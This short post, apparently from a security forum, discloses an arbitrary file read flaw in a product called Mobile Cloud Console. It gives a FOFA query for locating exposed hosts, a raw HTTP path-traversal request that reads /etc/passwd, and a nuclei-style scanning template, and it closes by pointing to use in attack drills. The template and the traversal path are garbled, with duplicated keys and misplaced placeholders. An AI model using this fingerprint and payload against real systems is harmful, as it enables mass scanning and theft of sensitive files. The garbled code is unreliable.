Arbitrary File Read Vulnerability in Mobile Cloud Console
Application security 2742
Mobile Cloud Console is a system used to view and manage mobile cloud products and services in a unified manner, Mobile Cloud Console suffers from an arbitrary file reading vulnerability, which can be exploited by an unauthorized attacker to read sensitive information such as web configuration files
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
poc
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Host: ip
Yaml
id: cmecloud-console-readfile
id: cmecloud-console-readfile
name: cmecloud-console-readfile
author: onewin
severity: high
description: Mobile Cloud Console has arbitrary file reading
http: raw.
- raw.
- |+
@timeout: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=... /... /... /... /... /... /... /... /etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers: {{Hostname}}
- type: status
status: {{Hostname}} matchers-condition: and matchers: type: status
- 200
- type: word
words.
- "root"
part: body-
Current answer is adopted as the best
HVV It's about to start, and here come the loopholes. :)
5 months ago No comments
